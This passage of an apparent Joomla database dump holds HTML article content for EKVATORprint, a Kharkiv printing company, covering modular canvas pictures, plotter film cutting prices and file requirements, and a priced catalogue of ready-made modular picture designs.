url(\'//img.youtube.com/vi/EJeKOcemgVg/maxresdefault.jpg\')  0% 0% / cover;\">\r\n		<script src=\"/media/youtube/play2.js\" type=\"text/javascript\"></script>\r\n		<div class=\"video1-play\" data-video=\"EJeKOcemgVg\" onclick=\"videoplay(this);\">&nbsp;</div>\r\n	</div>\r\n	<p>&nbsp;</p>\r\n	<p>&nbsp;</p>\r\n	<p>&nbsp;</p>\r\n	<table style=\"width: 730px; height: 71px;\" border=\"0\">\r\n		<tbody>\r\n			<tr>\r\n				<td>\r\n					<p style=\"text-align: center; font-size: 170%; color: #0000ff; padding: 5px;\">Выбрать готовый макет картин для заказа можно в разделе</p>\r\n					<p><a href=\"internet-katalog-modulnykh-kartin\" class=\"buttons buttons-narrow float-center\" style=\"font-size: 200%; font-weight: bold;\">КАТАЛОГ МОДУЛЬНЫХ КАРТИН&gt;&gt;</a></p>\r\n					<p>&nbsp;</p>\r\n				</td>\r\n			</tr>\r\n		</tbody>\r\n	</table>\r\n	<p>&nbsp;&nbsp;</p>\r\n	<p style=\"text-align: justify; font-size: 160%;\">Информацию для заказа однокомпонентных картин по Вашему фото (картин, состоящих из одного модуля), а также цены на все размеры можно посмотреть в разделе <a style=\"font-size: 140%;\" href=\"printing-on-canvas\">Печать на холсте</a></p>\r\n	<p id=\"modulnie_kartini\">&nbsp;</p>\r\n	<p style=\"text-align: justify;\"><span style=\"font-size: 130%;\"> При производстве модульных картин мы применяем передовые технологии. Срок использования наших модульных картин в интерьере - не ограничен. Краски не выцветают, не смываются и не стираются.</span></p>\r\n	<p style=\"font-size: 130%;\">У нас Вы сможете <em>заказать модульные картины диптих,триптих, </em>четырехкомпонентные <strong style=\"font-size: 120%;\">высокого качества по лучшим ценам!</strong></p>\r\n	<p>&nbsp;</p>\r\n	<p style=\"text-align: center;\">&nbsp;</p>\r\n</div>\r\n<table style=\"width: 600px; height: 21px; background-color: #6699cc;\" border=\"0\">\r\n	<tbody>\r\n		<tr>\r\n			<td>&nbsp;</td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<p><img style=\"border-width: 0pt; border-style: none; margin: 1px; vertical-align: middle;\" title=\"широкоформатная печать Харьков\" src=\"images/stories/kraski.jpg\" alt=\"широкоформатная печать Харьков\" width=\"50\" border=\"0\" />Помимо модульных картин в ЭВАТОРпринт можно также заказать:</p>\r\n<p>-&nbsp;<a href=\"printing-on-vinyl\">печать самоклеющейся пленки</a>&nbsp;- отличный вариант для брендирования</p>\r\n<p>-&nbsp;<a href=\"banner-printing\">печать баннера</a>&nbsp;- яркая реклама большого формата</p>\r\n<p>-&nbsp;<a href=\"print-billboards\">печать на бумаге блюбек</a>&nbsp;- недорогая реклама</p>\r\n<p>-&nbsp;<a href=\"plotternaya-podrezka\">плоттерная порезка пленки</a>&nbsp;- изготовление стикеров и аппликаций на самоклейке</p>\r\n<div class=\"con\">\r\n	<div><img src=\"/images/modulnie%20kartini/мк-130.png\" /></div>\r\n	<div><img src=\"/images/modulnie%20kartini/мк-124.png\" /></div>\r\n	<div><img src=\"/images/modulnie%20kartini/%D0%BC%D0%BA-125.png\" /></div>\r\n	<div><img src=\"/images/modulnie%20kartini/%D0%BC%D0%BA-117.png\" /></div>\r\n	<div><img src=\"/images/modulnie%20kartini/%D0%BC%D0%BA-119.png\" /></div>\r\n	<div><img src=\"/images/modulnie%20kartini/%D0%BC%D0%BA-115.png\" /></div>\r\n</div>','',1,8,'2016-04-08 12:00:30',62,'','2021-08-06 15:16:56',62,62,'2021-08-06 15:16:56','2016-04-08 12:00:30','0000-00-00 00:00:00','{}','{}','{\"article_layout\":\"\",\"show_title\":\"0\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',470,5,'модульные картины Харьков: диптих, триптих','Модульные картины высокого качества по низким ценам. Под заказ до 2х дней. Для дома и офиса, на любую тематику: цветы, города, природа. ',1,112423,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(30,82,'Плоттерная порезка пленки','plotternaya-podrezka-plenki','<h1 style=\"text-align: center;\"><span style=\"color: #0000ff;\">Плоттерная порезка пленки</span></h1>\r\n<table style=\"width: 749px; height: 120px;\" border=\"0\">\r\n	<tbody>\r\n		<tr>\r\n			<td style=\"border: 1px solid #ffffff; background-color: #f5f5f5;\">&nbsp;\r\n				<h3><strong style=\"color: #0000ff;\"><span style=\"font-size: 100%;\">&nbsp; Цена плоттерной порезки <span style=\"font-size: 60%;\"><br />&nbsp;&nbsp;&nbsp;(грн./м2):</span></span></strong></h3>\r\n			</td>\r\n			<td style=\"border: 1px solid #ffffff; background-color: #e7e6b6;\">\r\n				<p style=\"text-align: center;\"><span style=\"font-size: 105%;\"><span style=\"font-size: 105%;\">До <span style=\"font-size: 145%;\">1</span> м2</span>\r\n					</span>\r\n				</p>\r\n			</td>\r\n			<td style=\"border: 1px solid #ffffff; background-color: #e7e6b6;\">\r\n				<p style=\"text-align: center;\"><span style=\"font-size: 105%;\"><span style=\"font-size: 105%;\">От <span style=\"font-size: 145%;\">1</span> м2</span>\r\n					</span>\r\n				</p>\r\n			</td>\r\n			<td style=\"border: 1px solid #ffffff; background-color: #e7e6b6;\">\r\n				<p style=\"text-align: center;\"><span style=\"font-size: 105%; background-color: #e7e6b6;\">От&nbsp;</span><span style=\"font-size: 155%; background-color: #e7e6b6;\">5</span><span style=\"font-size: 105%; background-color: #e7e6b6;\">&nbsp;м2</span></p>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"border: 1px solid #ffffff; background-color: #ffff99;\"><span style=\"font-size: 150%;\">&nbsp; Печать</span> <span style=\"font-size: 110%;\">на пленке FOTOJET</span> <span style=\"font-size: 150%;\"><br />&nbsp;&nbsp;c обрезкой по контуру</span></td>\r\n			<td style=\"border: 1px solid #ffffff; background-color: #ffff99;\"><span style=\"font-size: 160%;\">&nbsp; 175<span style=\"font-size: 60%; background-color: #ffff99;\">грн</span></span>\r\n			</td>\r\n			<td style=\"border: 1px solid #ffffff; background-color: #ffff99;\"><span style=\"font-size: 160%;\">&nbsp; &nbsp;145<span style=\"font-size: 60%; background-color: #ffff99;\">грн</span></span>\r\n			</td>\r\n			<td style=\"border: 1px solid #ffffff; background-color: #ffff99;\">&nbsp; &nbsp;<span style=\"font-size: 160%;\">112<span style=\"font-size: 60%; background-color: #ffff99;\">грн</span></span>\r\n			</td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: justify; margin: 10px;\"><span style=\"font-size: 140%;\">&nbsp;На сегодняшний день спектр применения плоттерной порезки очень обширный. <em>Плоттерная порезка пленки применяется &nbsp;при оклейке &nbsp;витрин магазинов аппликациями, для рекламы на авто,&nbsp;для переноса аппликаций с термопленки на убувь и одежду, для световой рекламы, для изготовления стикеров...&nbsp;</em> </span></p>\r\n<h3 style=\"margin: 10px;\"><span style=\"color: #0000ff;\">Плоттерная порезка самоклеющейся пленки FOTO<em>JET</em> в ЭКВАТОРпринт:</span></h3>\r\n<p><img src=\"images/portfolio/plotternaya-podrezka/плоттерная%20подрезка%20в%20ЭкваторПринт.png\" alt=\"плоттерная порезка в ЭкваторПринт\" width=\"746\" height=\"167\" style=\"display: block; margin: 10px;\" /></p>\r\n<p style=\"text-align: justify; margin: 10px;\"><span style=\"color: #000000; font-size: 130%;\">&nbsp;<span style=\"font-size: 90%;\">Компания Экваторпринт предлагает услуги порезки пленки на высококачественном оборудовании с оптическим датчиком для резки изображения по контуру. <span style=\"font-size: 120%; background-color: #ffff00;\">Погрешность при порезке может составлять до 1мм</span>, благодаря чему плоттерная <strong>порезка &nbsp;изображений <span style=\"text-align: justify;\">даже</span>&nbsp;небольшого формата будет выполнена с сохранением мельчайших деталей по контуру изображения.</strong></span>\r\n	</span>\r\n</p>\r\n<p style=\"text-align: justify; margin: 10px;\"><span style=\"font-size: 130%;\">&nbsp;<span style=\"background-color: #fefec8;\">Реклама из самоклеющейся пленки с плоттерной порезкой будет выглядеть в разы привлекательней, ведь изображения вырезанные по контуру смотрятся гораздо реалистичней. В то же время аппликации на пленке для витрин будут практичными, поскольку большая часть витрины остается прозрачной и потерь в освещении помещения дневным светом практически не будет.</span></span>\r\n</p>\r\n<p>&nbsp;</p>\r\n<hr />\r\n<p style=\"text-align: center;\">&nbsp;</p>\r\n<p style=\"text-align: center; font-size: 120%; margin: 10px;\"><span style=\"font-size: 150%; background-color: #fbfb89;\">Заказ</span> печати пленки с плотерной порезкой <span style=\"font-size: 150%; background-color: #fbfb89;\">можно оформить по e-mail</span>. Для оформления заказа высылайте Ваш макет на нашу электронную почту:&nbsp;<span style=\"font-size: 150%; background-color: #fbfb89;\"><a href=\"mailto:e@ekvatorprint.com.ua\">e@ekvatorprint.com.ua</a></span></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #0000ff; font-size: 140%;\">&nbsp;<strong><span style=\"font-family: \'arial black\', \'avant garde\';\">Требования к макету для печати пленки c плоттерной порезкой по контуру:</span></strong>\r\n	</span><span style=\"font-family: \'arial black\', \'avant garde\';\"><br /></span></p>\r\n<p style=\"text-align: center; margin: 10px;\">&nbsp;<span style=\"font-size: 130%;\">Файлы для печати пленки с плоттерной порезкой просьба присылать <span style=\"background-color: #ffff00;\"><strong>в формате PDF или PNG c cохранением прозрачного фона</strong></span>. Все остальные параметры макета можно посмотреть в разделе <a href=\"trebovaniya\">ТРЕБОВАНИЯ К МАКЕТАМ</a>.</span>\r\n</p>\r\n<div style=\"margin: 10px;\">\r\n	<p style=\"text-align: center;\"><span style=\"font-size: 120%;\"><em><strong>Ширина рулона</strong></em> для печати с порезкой может быть<strong></strong><em><strong>&nbsp;</strong></em><em><strong>&nbsp;до 95см.</strong></em></span></p>\r\n	<p style=\"text-align: center;\"><span style=\"font-size: 120%;\">&nbsp;!!! Длина файла для порезки не должна превышать 90см. Если длина Вашего файла превышает 90см, разделите его пожалуйста на несколько частей. </span></p>\r\n	<p style=\"text-align: center;\"><span style=\"font-size: 120%; background-color: #ffff00;\">Таким образом файл для порезки не рекомендуем делать больше 95х90см.</span></p>\r\n	<p style=\"text-align: center;\"><span style=\"font-size: 120%;\">В макете не должно быть мелких элементов (с одной из сторон или диаметром менее 3мм) иначе качество порезки сильно ухудшится.</span></p>\r\n</div>\r\n<p>&nbsp;</p>\r\n<hr />\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: justify; font-size: 110%; margin: 10px;\">Плоттерная порезка осуществляется в городе Харьков. Комнания ЭКВАТОРпринт доставляет продукцию во Все города Украины.</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<table style=\"width: 760px; height: 21px; background-color: #6699cc;\" border=\"0\">\r\n	<tbody>\r\n		<tr>\r\n			<td>&nbsp;</td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<p><img style=\"border-width: 0pt; border-style: none; margin: 1px; vertical-align: middle;\" title=\"широкоформатная печать Харьков\" src=\"images/stories/kraski.jpg\" alt=\"широкоформатная печать Харьков\" width=\"50\" border=\"0\" />Другие услуги компании ЭКВАТОРпринт:</p>\r\n<p>- <a href=\"printing-on-vinyl\">печать на FOTOJET</a>&nbsp;- качественная пленка для наружного и интерьерного применения</p>\r\n<p>-&nbsp;<a href=\"banner-printing\">баннер ламинированый</a>&nbsp;- качественная недорогая печать баннеров для реклам</p>\r\n<p>-&nbsp;<a href=\"print-citylights\">печать на бумаге ситик</a>&nbsp;- белоснежная бумага для световых рекламных конструкций</p>\r\n<p>- <a href=\"printing-on-canvas\">картины на подрамнике</a> - печать на холсте под заказ за 1-2 дня</p>\r\n<p>&nbsp;</p>','',1,8,'2016-05-04 09:58:18',62,'','2022-01-23 14:29:32',62,0,'0000-00-00 00:00:00','2016-05-04 09:58:18','0000-00-00 00:00:00','{}','{}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',223,4,'Плоттерная порезка пленки Харьков','Качественная плоттерная порезка пленки в городе Харьков',1,26829,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(31,83,'Каталог модульных картин','katalog-modulnykh-kartin','<table border=\"0\" style=\"color: #000000; text-align: center; width: 770px; height: 37px;\">\r\n	<tbody>\r\n		<tr>\r\n			<td>\r\n				<h1 style=\"text-align: center;\"><span style=\"font-size: 12pt; color: #050000;\">Ниже представлен каталог готовых макетов модульных картин</span></h1>\r\n				<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #0000ff;\">Для оформления заказа&nbsp;</span></span>\r\n				</p>\r\n				<p style=\"text-align: center;\"><span style=\"font-size: 12pt;\">присылайте артикул&nbsp;выбраной картины&nbsp;<span style=\"font-size: 10pt; color: #333333;\">(к прим. МК-2)&nbsp;<span style=\"font-size: 16px;\">на электронную почту:&nbsp;<span style=\"text-decoration: underline;\"><span style=\"font-size: 18pt;\"><span style=\"color: #0000ff;\"><a href=\"mailto:ekvatorprint@mail.ru\">e@kvatorprint.com.ua</a></span></span>\r\n					</span>\r\n					</span>\r\n					</span>\r\n					</span>\r\n				</p>\r\n				<h4 style=\"font-size: 11px;\"><span style=\"color: #0000ff;\">Модульные картины (каталог):&nbsp;</span></h4>\r\n				<p style=\"text-align: left;\"><span style=\"color: #ff0000;\"><em>При заказе от 10ти модульных картин скидка 10%</em></span></p>\r\n				<table border=\"0\" style=\"color: #000000; width: 707px; height: 2661px;\">\r\n					<tbody>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-129.png\" width=\"250\" height=\"105\" alt=\"мк 129\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-130.png\" width=\"250\" height=\"105\" alt=\"мк 130\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-131.png\" width=\"250\" height=\"155\" alt=\"мк 131\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center; color: #000080;\"><span style=\"font-size: 14pt;\">МК-129</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center; color: #000080;\"><span style=\"font-size: 14pt;\">МК-130</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center; color: #000080;\"><span style=\"font-size: 14pt;\">МК-131</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center;\"><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">270</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center;\"><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">270</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center;\"><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">174</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. картины (см):</span><span style=\"text-align: center;\">&nbsp;105х40</span></td>\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. картины (см):</span><span style=\"text-align: center;\">&nbsp;105х40</span></td>\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. картины (см):&nbsp;63х39</span></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. модулей:&nbsp;</span><span style=\"text-align: center;\">35х40, 35х40, 35х40</span></td>\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. модулей:&nbsp;</span><span style=\"text-align: center;\">35х40, 35х40, 35х40</span></td>\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. модулей: 20х20, 20х40, 20х25</span></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-126.png\" width=\"250\" height=\"155\" alt=\"мк 126\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-127.png\" width=\"250\" height=\"172\" alt=\"мк 127\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-128.png\" width=\"250\" height=\"105\" alt=\"мк 128\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center; color: #000080;\"><span style=\"font-size: 14pt;\">МК-126</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center; color: #000080;\"><span style=\"font-size: 14pt;\">МК-127</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center; color: #000080;\"><span style=\"font-size: 14pt;\">МК-128</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center;\"><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">214</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center;\"><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">375</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center;\"><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">270</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. картины (см):&nbsp;77х43</span></td>\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. картины (см): 107х69</span></td>\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. картины (см): 105х40</span></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. модулей:</span><span style=\"text-align: center;\">&nbsp;25х35, 25х35, 25х35</span></td>\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. модулей: 25х55, 25х55, 25х55, 25х55</span></td>\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. модулей:&nbsp;35х40, 35х40, 35х40</span></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-123.png\" width=\"254\" height=\"139\" alt=\"мк 123\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-124.png\" alt=\"мк 124\" width=\"250\" height=\"151\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-125.png\" width=\"250\" height=\"155\" alt=\"мк 125\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center; color: #000080;\"><span style=\"font-size: 14pt;\">МК-122</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center; color: #000080;\"><span style=\"font-size: 14pt;\">МК-124</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center; color: #000080;\"><span style=\"font-size: 14pt;\">МК-125</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center;\"><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">325</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center;\"><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">364</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center;\"><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">214</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. картины (см):&nbsp;133х70</span></td>\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. картины (см):&nbsp;104х60</span></td>\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. картины (см):&nbsp;77х43</span></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. модулей:</span><span style=\"text-align: center;\">&nbsp;25х20, 25х55, 25х70, 25х40, 30х25</span></td>\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. модулей: 20х25, 20х45, 20х60, 20х50, 20х35</span></td>\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. модулей: 25х35, 25х35, 25х35</span></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-120.png\" alt=\"мк 120\" width=\"258\" height=\"174\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-121.png\" width=\"250\" height=\"169\" alt=\"мк 121\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-122.png\" width=\"250\" height=\"137\" alt=\"мк 122\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center; color: #000080;\"><span style=\"font-size: 14pt;\">МК-120</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center; color: #000080;\"><span style=\"font-size: 14pt;\">МК-121</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center; color: #000080;\"><span style=\"font-size: 14pt;\">МК-122</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center;\"><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">174</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center;\"><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">174</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"text-align: center;\"><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">325</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. картины (см):&nbsp;63x39</span></td>\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. картины (см):&nbsp;63x39</span></td>\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. картины (см):&nbsp;133х70</span></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. модулей: 20х20, 20х40, 